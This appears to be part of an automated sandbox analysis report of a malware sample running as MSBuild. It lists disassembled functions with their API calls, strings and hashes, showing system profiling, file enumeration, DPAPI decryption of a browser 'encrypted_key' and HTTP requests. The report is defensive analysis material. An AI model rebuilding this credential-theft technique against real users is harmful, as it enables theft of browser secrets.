InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94

Function 00410F51 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60

Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 00410581

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: b9c3853fef23caf07c4bbe14b1cc1093c34e1e9f3ec2cfce986836b4223b7196
Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
Opcode Fuzzy Hash: b9c3853fef23caf07c4bbe14b1cc1093c34e1e9f3ec2cfce986836b4223b7196
Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89

Function 00416ED6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00416EDD
lstrlenA.KERNEL32(?,0000001C), ref: 00416EE8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416F6C

Strings

ERROR, xrefs: 00416F64

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: 3839105bb85ea6eef1903a5d03da892e36e8fa90d6621a210e44ba5eb4c8eece
Instruction ID: 206493d018c0af61ad3247b9a1edf73ec3ff293b71de332acb6c3f6d1aa8c941
Opcode Fuzzy Hash: 3839105bb85ea6eef1903a5d03da892e36e8fa90d6621a210e44ba5eb4c8eece
Instruction Fuzzy Hash: 5711B131900209AFCB40FF75D9026DCBBB1BF04308B80413AE814E3191D739EAA98FC9

Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
CloseHandle.KERNEL32(00000000), ref: 0041228E

Strings

=A, xrefs: 0041225D, 00412262

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: =A
API String ID: 3183270410-2399317284
Opcode ID: 72c40201efdd98e4edf8bbd3583afce16a5aafa9b07f53dd0fe7720fa140496e
Instruction ID: ac01e61fcc3a8dc6a5e43971812eb7396920612e483317b6d6b91c956b259603
Opcode Fuzzy Hash: 72c40201efdd98e4edf8bbd3583afce16a5aafa9b07f53dd0fe7720fa140496e
Instruction Fuzzy Hash: 84F0B471600218ABDB24EB68DC45FEF77BC9B44B08F10006AF645D7180EEB5DAC58B54

Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001), ref: 0040B3D7
lstrlenA.KERNEL32(?), ref: 0040B529
lstrlenA.KERNEL32(?), ref: 0040B544
DeleteFileA.KERNEL32(?), ref: 0040B596

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: ad945740b977ff1f36274d2f8366a4f9c8c35b8e2ebe285de2857eeab0d8ecfe
Instruction ID: f20441c87b7e9a3b4f7029758dad72c3b509e7d63b864ac140ecc9ec0d22b659
Opcode Fuzzy Hash: ad945740b977ff1f36274d2f8366a4f9c8c35b8e2ebe285de2857eeab0d8ecfe
Instruction Fuzzy Hash: 2D714072A00119ABCF01FBA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B98

Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
lstrlenA.KERNEL32(?), ref: 0040D4B2

Strings

moz-extension+++, xrefs: 0040D4DD
^userContextId=4294967295, xrefs: 0040D4D7

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: ae3a14dfbe6f3ec2ed6d2cc1cd355128f425982979edd8864c0be2403f7a9293
Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
Opcode Fuzzy Hash: ae3a14dfbe6f3ec2ed6d2cc1cd355128f425982979edd8864c0be2403f7a9293
Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9

Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

"encrypted_key":", xrefs: 004081DF
DPAPI, xrefs: 0040821B
, xrefs: 00408241

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2311102621-738592651
Opcode ID: 034d3ebf0bbd41a52b14413c82dab1af8e55324f20d12265e500f68ae9061e99
Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
Opcode Fuzzy Hash: 034d3ebf0bbd41a52b14413c82dab1af8e55324f20d12265e500f68ae9061e99
Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58

Function 00416330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
lstrcatA.KERNEL32(?), ref: 00416396

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

Strings

~{A, xrefs: 004164AE

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: ~{A
API String ID: 2104210347-1816022387
Opcode ID: 48da02e1e35bd615d58e63d55da032bf86aad5faf3161476d003d3cbf91425f6
Instruction ID: ef6e44f044fd48bf473e8ed9b3318a571f04af2e7fbcf45178638c8cb6289389
Opcode Fuzzy Hash: 48da02e1e35bd615d58e63d55da032bf86aad5faf3161476d003d3cbf91425f6
Instruction Fuzzy Hash: 3231F77280010DEFDF15EB60DC43EE8377AEB08314F1440AEF606932A1EA769B919F55

Function 0041683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873

Strings

ERROR, xrefs: 0041686B
ERROR, xrefs: 00416896

Memory Dump Source

